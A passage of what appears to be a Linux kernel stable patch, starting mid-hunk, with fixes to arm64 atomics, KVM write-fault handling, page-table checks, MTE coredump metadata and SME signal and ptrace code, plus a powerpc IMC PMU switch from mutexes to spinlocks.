++	: "=&r" (tmp), "=&r" (ret), "+Q" (*(__uint128_t *)ptr)		\
+ 	: "r" (old1), "r" (old2), "r" (new1), "r" (new2)		\
+ 	: cl);								\
+ 									\
+diff --git a/arch/arm64/include/asm/atomic_lse.h b/arch/arm64/include/asm/atomic_lse.h
+index 52075e93de6c0..a94d6dacc0292 100644
+--- a/arch/arm64/include/asm/atomic_lse.h
++++ b/arch/arm64/include/asm/atomic_lse.h
+@@ -311,7 +311,7 @@ __lse__cmpxchg_double##name(unsigned long old1,				\
+ 	"	eor	%[old2], %[old2], %[oldval2]\n"			\
+ 	"	orr	%[old1], %[old1], %[old2]"			\
+ 	: [old1] "+&r" (x0), [old2] "+&r" (x1),				\
+-	  [v] "+Q" (*(unsigned long *)ptr)				\
++	  [v] "+Q" (*(__uint128_t *)ptr)				\
+ 	: [new1] "r" (x2), [new2] "r" (x3), [ptr] "r" (x4),		\
+ 	  [oldval1] "r" (oldval1), [oldval2] "r" (oldval2)		\
+ 	: cl);								\
+diff --git a/arch/arm64/include/asm/kvm_emulate.h b/arch/arm64/include/asm/kvm_emulate.h
+index 9bdba47f7e149..0d40c48d81329 100644
+--- a/arch/arm64/include/asm/kvm_emulate.h
++++ b/arch/arm64/include/asm/kvm_emulate.h
+@@ -373,8 +373,26 @@ static __always_inline int kvm_vcpu_sys_get_rt(struct kvm_vcpu *vcpu)
+ 
+ static inline bool kvm_is_write_fault(struct kvm_vcpu *vcpu)
+ {
+-	if (kvm_vcpu_abt_iss1tw(vcpu))
+-		return true;
++	if (kvm_vcpu_abt_iss1tw(vcpu)) {
++		/*
++		 * Only a permission fault on a S1PTW should be
++		 * considered as a write. Otherwise, page tables baked
++		 * in a read-only memslot will result in an exception
++		 * being delivered in the guest.
++		 *
++		 * The drawback is that we end-up faulting twice if the
++		 * guest is using any of HW AF/DB: a translation fault
++		 * to map the page containing the PT (read only at
++		 * first), then a permission fault to allow the flags
++		 * to be set.
++		 */
++		switch (kvm_vcpu_trap_get_fault_type(vcpu)) {
++		case ESR_ELx_FSC_PERM:
++			return true;
++		default:
++			return false;
++		}
++	}
+ 
+ 	if (kvm_vcpu_trap_is_iabt(vcpu))
+ 		return false;
+diff --git a/arch/arm64/include/asm/pgtable.h b/arch/arm64/include/asm/pgtable.h
+index edf6625ce9654..f1cfc44ef52fe 100644
+--- a/arch/arm64/include/asm/pgtable.h
++++ b/arch/arm64/include/asm/pgtable.h
+@@ -682,7 +682,7 @@ static inline unsigned long pmd_page_vaddr(pmd_t pmd)
+ #define pud_leaf(pud)		(pud_present(pud) && !pud_table(pud))
+ #define pud_valid(pud)		pte_valid(pud_pte(pud))
+ #define pud_user(pud)		pte_user(pud_pte(pud))
+-
++#define pud_user_exec(pud)	pte_user_exec(pud_pte(pud))
+ 
+ static inline void set_pud(pud_t *pudp, pud_t pud)
+ {
+@@ -863,12 +863,12 @@ static inline bool pte_user_accessible_page(pte_t pte)
+ 
+ static inline bool pmd_user_accessible_page(pmd_t pmd)
+ {
+-	return pmd_leaf(pmd) && (pmd_user(pmd) || pmd_user_exec(pmd));
++	return pmd_leaf(pmd) && !pmd_present_invalid(pmd) && (pmd_user(pmd) || pmd_user_exec(pmd));
+ }
+ 
+ static inline bool pud_user_accessible_page(pud_t pud)
+ {
+-	return pud_leaf(pud) && pud_user(pud);
++	return pud_leaf(pud) && (pud_user(pud) || pud_user_exec(pud));
+ }
+ #endif
+ 
+diff --git a/arch/arm64/kernel/elfcore.c b/arch/arm64/kernel/elfcore.c
+index 27ef7ad3ffd2e..662a61e5e75e4 100644
+--- a/arch/arm64/kernel/elfcore.c
++++ b/arch/arm64/kernel/elfcore.c
+@@ -8,28 +8,27 @@
+ #include <asm/cpufeature.h>
+ #include <asm/mte.h>
+ 
+-#define for_each_mte_vma(vmi, vma)					\
++#define for_each_mte_vma(cprm, i, m)					\
+ 	if (system_supports_mte())					\
+-		for_each_vma(vmi, vma)					\
+-			if (vma->vm_flags & VM_MTE)
++		for (i = 0, m = cprm->vma_meta;				\
++		     i < cprm->vma_count;				\
++		     i++, m = cprm->vma_meta + i)			\
++			if (m->flags & VM_MTE)
+ 
+-static unsigned long mte_vma_tag_dump_size(struct vm_area_struct *vma)
++static unsigned long mte_vma_tag_dump_size(struct core_vma_metadata *m)
+ {
+-	if (vma->vm_flags & VM_DONTDUMP)
+-		return 0;
+-
+-	return vma_pages(vma) * MTE_PAGE_TAG_STORAGE;
++	return (m->dump_size >> PAGE_SHIFT) * MTE_PAGE_TAG_STORAGE;
+ }
+ 
+ /* Derived from dump_user_range(); start/end must be page-aligned */
+ static int mte_dump_tag_range(struct coredump_params *cprm,
+-			      unsigned long start, unsigned long end)
++			      unsigned long start, unsigned long len)
+ {
+ 	int ret = 1;
+ 	unsigned long addr;
+ 	void *tags = NULL;
+ 
+-	for (addr = start; addr < end; addr += PAGE_SIZE) {
++	for (addr = start; addr < start + len; addr += PAGE_SIZE) {
+ 		struct page *page = get_dump_page(addr);
+ 
+ 		/*
+@@ -65,7 +64,6 @@ static int mte_dump_tag_range(struct coredump_params *cprm,
+ 		mte_save_page_tags(page_address(page), tags);
+ 		put_page(page);
+ 		if (!dump_emit(cprm, tags, MTE_PAGE_TAG_STORAGE)) {
+-			mte_free_tag_storage(tags);
+ 			ret = 0;
+ 			break;
+ 		}
+@@ -77,13 +75,13 @@ static int mte_dump_tag_range(struct coredump_params *cprm,
+ 	return ret;
+ }
+ 
+-Elf_Half elf_core_extra_phdrs(void)
++Elf_Half elf_core_extra_phdrs(struct coredump_params *cprm)
+ {
+-	struct vm_area_struct *vma;
++	int i;
++	struct core_vma_metadata *m;
+ 	int vma_count = 0;
+-	VMA_ITERATOR(vmi, current->mm, 0);
+ 
+-	for_each_mte_vma(vmi, vma)
++	for_each_mte_vma(cprm, i, m)
+ 		vma_count++;
+ 
+ 	return vma_count;
+@@ -91,18 +89,18 @@ Elf_Half elf_core_extra_phdrs(void)
+ 
+ int elf_core_write_extra_phdrs(struct coredump_params *cprm, loff_t offset)
+ {
+-	struct vm_area_struct *vma;
+-	VMA_ITERATOR(vmi, current->mm, 0);
++	int i;
++	struct core_vma_metadata *m;
+ 
+-	for_each_mte_vma(vmi, vma) {
++	for_each_mte_vma(cprm, i, m) {
+ 		struct elf_phdr phdr;
+ 
+ 		phdr.p_type = PT_AARCH64_MEMTAG_MTE;
+ 		phdr.p_offset = offset;
+-		phdr.p_vaddr = vma->vm_start;
++		phdr.p_vaddr = m->start;
+ 		phdr.p_paddr = 0;
+-		phdr.p_filesz = mte_vma_tag_dump_size(vma);
+-		phdr.p_memsz = vma->vm_end - vma->vm_start;
++		phdr.p_filesz = mte_vma_tag_dump_size(m);
++		phdr.p_memsz = m->end - m->start;
+ 		offset += phdr.p_filesz;
+ 		phdr.p_flags = 0;
+ 		phdr.p_align = 0;
+@@ -114,28 +112,25 @@ int elf_core_write_extra_phdrs(struct coredump_params *cprm, loff_t offset)
+ 	return 1;
+ }
+ 
+-size_t elf_core_extra_data_size(void)
++size_t elf_core_extra_data_size(struct coredump_params *cprm)
+ {
+-	struct vm_area_struct *vma;
++	int i;
++	struct core_vma_metadata *m;
+ 	size_t data_size = 0;
+-	VMA_ITERATOR(vmi, current->mm, 0);
+ 
+-	for_each_mte_vma(vmi, vma)
+-		data_size += mte_vma_tag_dump_size(vma);
++	for_each_mte_vma(cprm, i, m)
++		data_size += mte_vma_tag_dump_size(m);
+ 
+ 	return data_size;
+ }
+ 
+ int elf_core_write_extra_data(struct coredump_params *cprm)
+ {
+-	struct vm_area_struct *vma;
+-	VMA_ITERATOR(vmi, current->mm, 0);
+-
+-	for_each_mte_vma(vmi, vma) {
+-		if (vma->vm_flags & VM_DONTDUMP)
+-			continue;
++	int i;
++	struct core_vma_metadata *m;
+ 
+-		if (!mte_dump_tag_range(cprm, vma->vm_start, vma->vm_end))
++	for_each_mte_vma(cprm, i, m) {
++		if (!mte_dump_tag_range(cprm, m->start, m->dump_size))
+ 			return 0;
+ 	}
+ 
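/*
 * A minimal sketch of the size relation the rework above relies on,
 * with illustrative constants for a 4K-page kernel.  Each dumped page
 * contributes MTE_PAGE_TAG_STORAGE bytes of tags, so the extra segment
 * size follows from the snapshotted dump_size instead of the live VMA.
 */
#include <stddef.h>

#define PAGE_SHIFT		12
#define MTE_PAGE_TAG_STORAGE	128	/* 4K page: one 4-bit tag per 16-byte granule */

static size_t tag_dump_size(size_t dump_size)
{
	return (dump_size >> PAGE_SHIFT) * MTE_PAGE_TAG_STORAGE;
}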
+diff --git a/arch/arm64/kernel/ptrace.c b/arch/arm64/kernel/ptrace.c
+index c2fb5755bbecb..92bc9a2d702cb 100644
+--- a/arch/arm64/kernel/ptrace.c
++++ b/arch/arm64/kernel/ptrace.c
+@@ -1364,7 +1364,7 @@ enum aarch64_regset {
+ #ifdef CONFIG_ARM64_SVE
+ 	REGSET_SVE,
+ #endif
+-#ifdef CONFIG_ARM64_SVE
++#ifdef CONFIG_ARM64_SME
+ 	REGSET_SSVE,
+ 	REGSET_ZA,
+ #endif
+diff --git a/arch/arm64/kernel/signal.c b/arch/arm64/kernel/signal.c
+index 9ad911f1647c8..43adbfa5ead78 100644
+--- a/arch/arm64/kernel/signal.c
++++ b/arch/arm64/kernel/signal.c
+@@ -280,7 +280,12 @@ static int restore_sve_fpsimd_context(struct user_ctxs *user)
+ 
+ 		vl = task_get_sme_vl(current);
+ 	} else {
+-		if (!system_supports_sve())
++		/*
++		 * An SME-only system uses SVE for streaming mode, so it
++		 * can have an SVE-formatted context with a zero VL and
++		 * no payload data.
++		 */
++		if (!system_supports_sve() && !system_supports_sme())
+ 			return -EINVAL;
+ 
+ 		vl = task_get_sve_vl(current);
+@@ -729,7 +734,7 @@ static int setup_sigframe_layout(struct rt_sigframe_user_layout *user,
+ 			return err;
+ 	}
+ 
+-	if (system_supports_sve()) {
++	if (system_supports_sve() || system_supports_sme()) {
+ 		unsigned int vq = 0;
+ 
+ 		if (add_all || test_thread_flag(TIF_SVE) ||
+diff --git a/arch/ia64/kernel/elfcore.c b/arch/ia64/kernel/elfcore.c
+index 94680521fbf91..8895df1215404 100644
+--- a/arch/ia64/kernel/elfcore.c
++++ b/arch/ia64/kernel/elfcore.c
+@@ -7,7 +7,7 @@
+ #include <asm/elf.h>
+ 
+ 
+-Elf64_Half elf_core_extra_phdrs(void)
++Elf64_Half elf_core_extra_phdrs(struct coredump_params *cprm)
+ {
+ 	return GATE_EHDR->e_phnum;
+ }
+@@ -60,7 +60,7 @@ int elf_core_write_extra_data(struct coredump_params *cprm)
+ 	return 1;
+ }
+ 
+-size_t elf_core_extra_data_size(void)
++size_t elf_core_extra_data_size(struct coredump_params *cprm)
+ {
+ 	const struct elf_phdr *const gate_phdrs =
+ 		(const struct elf_phdr *) (GATE_ADDR + GATE_EHDR->e_phoff);
+diff --git a/arch/powerpc/include/asm/imc-pmu.h b/arch/powerpc/include/asm/imc-pmu.h
+index 4f897993b7107..699a88584ae16 100644
+--- a/arch/powerpc/include/asm/imc-pmu.h
++++ b/arch/powerpc/include/asm/imc-pmu.h
+@@ -137,7 +137,7 @@ struct imc_pmu {
+  * are inited.
+  */
+ struct imc_pmu_ref {
+-	struct mutex lock;
++	spinlock_t lock;
+ 	unsigned int id;
+ 	int refc;
+ };
+diff --git a/arch/powerpc/perf/imc-pmu.c b/arch/powerpc/perf/imc-pmu.c
+index d517aba94d1bc..100e97daf76ba 100644
+--- a/arch/powerpc/perf/imc-pmu.c
++++ b/arch/powerpc/perf/imc-pmu.c
+@@ -14,6 +14,7 @@
+ #include <asm/cputhreads.h>
+ #include <asm/smp.h>
+ #include <linux/string.h>
++#include <linux/spinlock.h>
+ 
+ /* Nest IMC data structures and variables */
+ 
+@@ -21,7 +22,7 @@
+  * Used to avoid races in counting the nest-pmu units during hotplug
+  * register and unregister
+  */
+-static DEFINE_MUTEX(nest_init_lock);
++static DEFINE_SPINLOCK(nest_init_lock);
+ static DEFINE_PER_CPU(struct imc_pmu_ref *, local_nest_imc_refc);
+ static struct imc_pmu **per_nest_pmu_arr;
+ static cpumask_t nest_imc_cpumask;
+@@ -50,7 +51,7 @@ static int trace_imc_mem_size;
+  * core and trace-imc
+  */
+ static struct imc_pmu_ref imc_global_refc = {
+-	.lock = __MUTEX_INITIALIZER(imc_global_refc.lock),
++	.lock = __SPIN_LOCK_INITIALIZER(imc_global_refc.lock),
+ 	.id = 0,
+ 	.refc = 0,
+ };
+@@ -400,7 +401,7 @@ static int ppc_nest_imc_cpu_offline(unsigned int cpu)
+ 				       get_hard_smp_processor_id(cpu));
+ 		/*
+ 		 * If this is the last cpu in this chip then, skip the reference
+-		 * count mutex lock and make the reference count on this chip zero.
++		 * count lock and make the reference count on this chip zero.
+ 		 */
+ 		ref = get_nest_pmu_ref(cpu);
+ 		if (!ref)
+@@ -462,15 +463,15 @@ static void nest_imc_counters_release(struct perf_event *event)
+ 	/*
+ 	 * See if we need to disable the nest PMU.
+ 	 * If no events are currently in use, then we have to take a
+-	 * mutex to ensure that we don't race with another task doing
++	 * lock to ensure that we don't race with another task doing
+ 	 * enable or disable the nest counters.
+ 	 */
+ 	ref = get_nest_pmu_ref(event->cpu);
+ 	if (!ref)
+ 		return;
+ 
+-	/* Take the mutex lock for this node and then decrement the reference count */
+-	mutex_lock(&ref->lock);
++	/* Take the lock for this node and then decrement the reference count */
++	spin_lock(&ref->lock);
+ 	if (ref->refc == 0) {
+ 		/*
+ 		 * The scenario where this is true is, when perf session is
+@@ -482,7 +483,7 @@ static void nest_imc_counters_release(struct perf_event *event)
+ 		 * an OPAL call to disable the engine in that node.
+ 		 *
+ 		 */
+-		mutex_unlock(&ref->lock);
++		spin_unlock(&ref->lock);
+ 		return;
+ 	}
+ 	ref->refc--;
+@@ -490,7 +491,7 @@ static void nest_imc_counters_release(struct perf_event *event)
+ 		rc = opal_imc_counters_stop(OPAL_IMC_COUNTERS_NEST,
+ 					    get_hard_smp_processor_id(event->cpu));
+ 		if (rc) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("nest-imc: Unable to stop the counters for core %d\n", node_id);
+ 			return;
+ 		}
+@@ -498,7 +499,7 @@ static void nest_imc_counters_release(struct perf_event *event)
+ 		WARN(1, "nest-imc: Invalid event reference count\n");
+ 		ref->refc = 0;
+ 	}
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ }
+ 
+ static int nest_imc_event_init(struct perf_event *event)
+@@ -557,26 +558,25 @@ static int nest_imc_event_init(struct perf_event *event)
+ 
+ 	/*
+ 	 * Get the imc_pmu_ref struct for this node.
+-	 * Take the mutex lock and then increment the count of nest pmu events
+-	 * inited.
++	 * Take the lock and then increment the count of nest pmu events inited.
+ 	 */
+ 	ref = get_nest_pmu_ref(event->cpu);
+ 	if (!ref)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	if (ref->refc == 0) {
+ 		rc = opal_imc_counters_start(OPAL_IMC_COUNTERS_NEST,
+ 					     get_hard_smp_processor_id(event->cpu));
+ 		if (rc) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("nest-imc: Unable to start the counters for node %d\n",
+ 									node_id);
+ 			return rc;
+ 		}
+ 	}
+ 	++ref->refc;
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 
+ 	event->destroy = nest_imc_counters_release;
+ 	return 0;
+@@ -612,9 +612,8 @@ static int core_imc_mem_init(int cpu, int size)
+ 		return -ENOMEM;
+ 	mem_info->vbase = page_address(page);
+ 
+-	/* Init the mutex */
+ 	core_imc_refc[core_id].id = core_id;
+-	mutex_init(&core_imc_refc[core_id].lock);
++	spin_lock_init(&core_imc_refc[core_id].lock);
+ 
+ 	rc = opal_imc_counters_init(OPAL_IMC_COUNTERS_CORE,
+ 				__pa((void *)mem_info->vbase),
+@@ -703,9 +702,8 @@ static int ppc_core_imc_cpu_offline(unsigned int cpu)
+ 		perf_pmu_migrate_context(&core_imc_pmu->pmu, cpu, ncpu);
+ 	} else {
+ 		/*
+-		 * If this is the last cpu in this core then, skip taking refernce
+-		 * count mutex lock for this core and directly zero "refc" for
+-		 * this core.
++		 * If this is the last cpu in this core then skip taking reference
++		 * count lock for this core and directly zero "refc" for this core.
+ 		 */
+ 		opal_imc_counters_stop(OPAL_IMC_COUNTERS_CORE,
+ 				       get_hard_smp_processor_id(cpu));
+@@ -720,11 +718,11 @@ static int ppc_core_imc_cpu_offline(unsigned int cpu)
+ 		 * last cpu in this core and core-imc event running
+ 		 * in this cpu.
+ 		 */
+-		mutex_lock(&imc_global_refc.lock);
++		spin_lock(&imc_global_refc.lock);
+ 		if (imc_global_refc.id == IMC_DOMAIN_CORE)
+ 			imc_global_refc.refc--;
+ 
+-		mutex_unlock(&imc_global_refc.lock);
++		spin_unlock(&imc_global_refc.lock);
+ 	}
+ 	return 0;
+ }
+@@ -739,7 +737,7 @@ static int core_imc_pmu_cpumask_init(void)
+ 
+ static void reset_global_refc(struct perf_event *event)
+ {
+-		mutex_lock(&imc_global_refc.lock);
++		spin_lock(&imc_global_refc.lock);
+ 		imc_global_refc.refc--;
+ 
+ 		/*
+@@ -751,7 +749,7 @@ static void reset_global_refc(struct perf_event *event)
+ 			imc_global_refc.refc = 0;
+ 			imc_global_refc.id = 0;
+ 		}
+-		mutex_unlock(&imc_global_refc.lock);
++		spin_unlock(&imc_global_refc.lock);
+ }
+ 
+ static void core_imc_counters_release(struct perf_event *event)
+@@ -764,17 +762,17 @@ static void core_imc_counters_release(struct perf_event *event)
+ 	/*
+ 	 * See if we need to disable the IMC PMU.
+ 	 * If no events are currently in use, then we have to take a
+-	 * mutex to ensure that we don't race with another task doing
++	 * lock to ensure that we don't race with another task doing
+ 	 * enable or disable the core counters.
+ 	 */
+ 	core_id = event->cpu / threads_per_core;
+ 
+-	/* Take the mutex lock and decrement the refernce count for this core */
++	/* Take the lock and decrement the reference count for this core */
+ 	ref = &core_imc_refc[core_id];
+ 	if (!ref)
+ 		return;
+ 
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	if (ref->refc == 0) {
+ 		/*
+ 		 * The scenario where this is true is, when perf session is
+@@ -786,7 +784,7 @@ static void core_imc_counters_release(struct perf_event *event)
+ 		 * an OPAL call to disable the engine in that core.
+ 		 *
+ 		 */
+-		mutex_unlock(&ref->lock);
++		spin_unlock(&ref->lock);
+ 		return;
+ 	}
+ 	ref->refc--;
+@@ -794,7 +792,7 @@ static void core_imc_counters_release(struct perf_event *event)
+ 		rc = opal_imc_counters_stop(OPAL_IMC_COUNTERS_CORE,
+ 					    get_hard_smp_processor_id(event->cpu));
+ 		if (rc) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("IMC: Unable to stop the counters for core %d\n", core_id);
+ 			return;
+ 		}
+@@ -802,7 +800,7 @@ static void core_imc_counters_release(struct perf_event *event)
+ 		WARN(1, "core-imc: Invalid event reference count\n");
+ 		ref->refc = 0;
+ 	}
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 
+ 	reset_global_refc(event);
+ }
+@@ -840,7 +838,6 @@ static int core_imc_event_init(struct perf_event *event)
+ 	if ((!pcmi->vbase))
+ 		return -ENODEV;
+ 
+-	/* Get the core_imc mutex for this core */
+ 	ref = &core_imc_refc[core_id];
+ 	if (!ref)
+ 		return -EINVAL;
+@@ -848,22 +845,22 @@ static int core_imc_event_init(struct perf_event *event)
+ 	/*
+ 	 * Core pmu units are enabled only when it is used.
+ 	 * See if this is triggered for the first time.
+-	 * If yes, take the mutex lock and enable the core counters.
++	 * If yes, take the lock and enable the core counters.
+ 	 * If not, just increment the count in core_imc_refc struct.
+ 	 */
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	if (ref->refc == 0) {
+ 		rc = opal_imc_counters_start(OPAL_IMC_COUNTERS_CORE,
+ 					     get_hard_smp_processor_id(event->cpu));
+ 		if (rc) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("core-imc: Unable to start the counters for core %d\n",
+ 									core_id);
+ 			return rc;
+ 		}
+ 	}
+ 	++ref->refc;
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 
+ 	/*
+ 	 * Since the system can run either in accumulation or trace-mode
+@@ -874,7 +871,7 @@ static int core_imc_event_init(struct perf_event *event)
+ 	 * to know whether any other trace/thread imc
+ 	 * events are running.
+ 	 */
+-	mutex_lock(&imc_global_refc.lock);
++	spin_lock(&imc_global_refc.lock);
+ 	if (imc_global_refc.id == 0 || imc_global_refc.id == IMC_DOMAIN_CORE) {
+ 		/*
+ 		 * No other trace/thread imc events are running in
+@@ -883,10 +880,10 @@ static int core_imc_event_init(struct perf_event *event)
+ 		imc_global_refc.id = IMC_DOMAIN_CORE;
+ 		imc_global_refc.refc++;
+ 	} else {
+-		mutex_unlock(&imc_global_refc.lock);
++		spin_unlock(&imc_global_refc.lock);
+ 		return -EBUSY;
+ 	}
+-	mutex_unlock(&imc_global_refc.lock);
++	spin_unlock(&imc_global_refc.lock);
+ 
+ 	event->hw.event_base = (u64)pcmi->vbase + (config & IMC_EVENT_OFFSET_MASK);
+ 	event->destroy = core_imc_counters_release;
+@@ -958,10 +955,10 @@ static int ppc_thread_imc_cpu_offline(unsigned int cpu)
+ 	mtspr(SPRN_LDBAR, (mfspr(SPRN_LDBAR) & (~(1UL << 63))));
+ 
+ 	/* Reduce the refc if thread-imc event running on this cpu */
+-	mutex_lock(&imc_global_refc.lock);
++	spin_lock(&imc_global_refc.lock);
+ 	if (imc_global_refc.id == IMC_DOMAIN_THREAD)
+ 		imc_global_refc.refc--;
+-	mutex_unlock(&imc_global_refc.lock);
++	spin_unlock(&imc_global_refc.lock);
+ 
+ 	return 0;
+ }
+@@ -1001,7 +998,7 @@ static int thread_imc_event_init(struct perf_event *event)
+ 	if (!target)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&imc_global_refc.lock);
++	spin_lock(&imc_global_refc.lock);
+ 	/*
+ 	 * Check if any other trace/core imc events are running in the
+ 	 * system, if not set the global id to thread-imc.
+@@ -1010,10 +1007,10 @@ static int thread_imc_event_init(struct perf_event *event)
+ 		imc_global_refc.id = IMC_DOMAIN_THREAD;
+ 		imc_global_refc.refc++;
+ 	} else {
+-		mutex_unlock(&imc_global_refc.lock);
++		spin_unlock(&imc_global_refc.lock);
+ 		return -EBUSY;
+ 	}
+-	mutex_unlock(&imc_global_refc.lock);
++	spin_unlock(&imc_global_refc.lock);
+ 
+ 	event->pmu->task_ctx_nr = perf_sw_context;
+ 	event->destroy = reset_global_refc;
+@@ -1135,25 +1132,25 @@ static int thread_imc_event_add(struct perf_event *event, int flags)
+ 	/*
+ 	 * imc pmus are enabled only when it is used.
+ 	 * See if this is triggered for the first time.
+-	 * If yes, take the mutex lock and enable the counters.
++	 * If yes, take the lock and enable the counters.
+ 	 * If not, just increment the count in ref count struct.
+ 	 */
+ 	ref = &core_imc_refc[core_id];
+ 	if (!ref)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	if (ref->refc == 0) {
+ 		if (opal_imc_counters_start(OPAL_IMC_COUNTERS_CORE,
+ 		    get_hard_smp_processor_id(smp_processor_id()))) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("thread-imc: Unable to start the counter\
+ 				for core %d\n", core_id);
+ 			return -EINVAL;
+ 		}
+ 	}
+ 	++ref->refc;
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 	return 0;
+ }
+ 
+@@ -1170,12 +1167,12 @@ static void thread_imc_event_del(struct perf_event *event, int flags)
+ 		return;
+ 	}
+ 
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	ref->refc--;
+ 	if (ref->refc == 0) {
+ 		if (opal_imc_counters_stop(OPAL_IMC_COUNTERS_CORE,
+ 		    get_hard_smp_processor_id(smp_processor_id()))) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("thread-imc: Unable to stop the counters\
+ 				for core %d\n", core_id);
+ 			return;
+@@ -1183,7 +1180,7 @@ static void thread_imc_event_del(struct perf_event *event, int flags)
+ 	} else if (ref->refc < 0) {
+ 		ref->refc = 0;
+ 	}
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 
+ 	/* Set bit 0 of LDBAR to zero, to stop posting updates to memory */
+ 	mtspr(SPRN_LDBAR, (mfspr(SPRN_LDBAR) & (~(1UL << 63))));
+@@ -1224,9 +1221,8 @@ static int trace_imc_mem_alloc(int cpu_id, int size)
+ 		}
+ 	}
+ 
+-	/* Init the mutex, if not already */
+ 	trace_imc_refc[core_id].id = core_id;
+-	mutex_init(&trace_imc_refc[core_id].lock);
++	spin_lock_init(&trace_imc_refc[core_id].lock);
+ 
+ 	mtspr(SPRN_LDBAR, 0);
+ 	return 0;
+@@ -1246,10 +1242,10 @@ static int ppc_trace_imc_cpu_offline(unsigned int cpu)
+ 	 * Reduce the refc if any trace-imc event running
+ 	 * on this cpu.
+ 	 */
+-	mutex_lock(&imc_global_refc.lock);
++	spin_lock(&imc_global_refc.lock);
+ 	if (imc_global_refc.id == IMC_DOMAIN_TRACE)
+ 		imc_global_refc.refc--;
+-	mutex_unlock(&imc_global_refc.lock);
++	spin_unlock(&imc_global_refc.lock);
+ 
+ 	return 0;
+ }
+@@ -1371,17 +1367,17 @@ static int trace_imc_event_add(struct perf_event *event, int flags)
+ 	}
+ 
+ 	mtspr(SPRN_LDBAR, ldbar_value);
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	if (ref->refc == 0) {
+ 		if (opal_imc_counters_start(OPAL_IMC_COUNTERS_TRACE,
+ 				get_hard_smp_processor_id(smp_processor_id()))) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("trace-imc: Unable to start the counters for core %d\n", core_id);
+ 			return -EINVAL;
+ 		}
+ 	}
+ 	++ref->refc;
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 	return 0;
+ }
+ 
+@@ -1414,19 +1410,19 @@ static void trace_imc_event_del(struct perf_event *event, int flags)
+ 		return;
+ 	}
+ 
+-	mutex_lock(&ref->lock);
++	spin_lock(&ref->lock);
+ 	ref->refc--;
+ 	if (ref->refc == 0) {
+ 		if (opal_imc_counters_stop(OPAL_IMC_COUNTERS_TRACE,
+ 				get_hard_smp_processor_id(smp_processor_id()))) {
+-			mutex_unlock(&ref->lock);
++			spin_unlock(&ref->lock);
+ 			pr_err("trace-imc: Unable to stop the counters for core %d\n", core_id);
+ 			return;
+ 		}
+ 	} else if (ref->refc < 0) {
+ 		ref->refc = 0;
+ 	}
+-	mutex_unlock(&ref->lock);
++	spin_unlock(&ref->lock);
+ 
+ 	trace_imc_event_stop(event, flags);
+ }
+@@ -1448,7 +1444,7 @@ static int trace_imc_event_init(struct perf_event *event)
+ 	 * no other thread is running any core/thread imc
+ 	 * events
+ 	 */
+-	mutex_lock(&imc_global_refc.lock);
++	spin_lock(&imc_global_refc.lock);
+ 	if (imc_global_refc.id == 0 || imc_global_refc.id == IMC_DOMAIN_TRACE) {
+ 		/*
+ 		 * No core/thread imc events are running in the
+@@ -1457,10 +1453,10 @@ static int trace_imc_event_init(struct perf_event *event)
+ 		imc_global_refc.id = IMC_DOMAIN_TRACE;
+ 		imc_global_refc.refc++;
+ 	} else {
+-		mutex_unlock(&imc_global_refc.lock);
++		spin_unlock(&imc_global_refc.lock);
+ 		return -EBUSY;
+ 	}
+-	mutex_unlock(&imc_global_refc.lock);
++	spin_unlock(&imc_global_refc.lock);
+ 
+ 	event->hw.idx = -1;
+ 
+@@ -1533,10 +1529,10 @@ static int init_nest_pmu_ref(void)
+ 	i = 0;
+ 	for_each_node(nid) {
+ 		/*
+-		 * Mutex lock to avoid races while tracking the number of
++		 * Take the lock to avoid races while tracking the number of
+ 		 * sessions using the chip's nest pmu units.
+ 		 */
+-		mutex_init(&nest_imc_refc[i].lock);
++		spin_lock_init(&nest_imc_refc[i].lock);
+ 
+ 		/*
+ 		 * Loop to init the "id" with the node_id. Variable "i" initialized to
+@@ -1633,7 +1629,7 @@ static void imc_common_mem_free(struct imc_pmu *pmu_ptr)
+ static void imc_common_cpuhp_mem_free(struct imc_pmu *pmu_ptr)
+ {
+ 	if (pmu_ptr->domain == IMC_DOMAIN_NEST) {
+-		mutex_lock(&nest_init_lock);
++		spin_lock(&nest_init_lock);
+ 		if (nest_pmus == 1) {
+ 			cpuhp_remove_state(CPUHP_AP_PERF_POWERPC_NEST_IMC_ONLINE);
+ 			kfree(nest_imc_refc);
+@@ -1643,7 +1639,7 @@ static void imc_common_cpuhp_mem_free(struct imc_pmu *pmu_ptr)
+ 
+ 		if (nest_pmus > 0)
+ 			nest_pmus--;
+-		mutex_unlock(&nest_init_lock);
++		spin_unlock(&nest_init_lock);
+ 	}
+ 
+ 	/* Free core_imc memory */
+@@ -1800,11 +1796,11 @@ int init_imc_pmu(struct device_node *parent, struct imc_pmu *pmu_ptr, int pmu_id
+ 		* rest. To handle the cpuhotplug callback unregister, we track
+ 		* the number of nest pmus in "nest_pmus".
+ 		*/
+-		mutex_lock(&nest_init_lock);
++		spin_lock(&nest_init_lock);
+ 		if (nest_pmus == 0) {
+ 			ret = init_nest_pmu_ref();
+ 			if (ret) {
+-				mutex_unlock(&nest_init_lock);
++				spin_unlock(&nest_init_lock);
+ 				kfree(per_nest_pmu_arr);
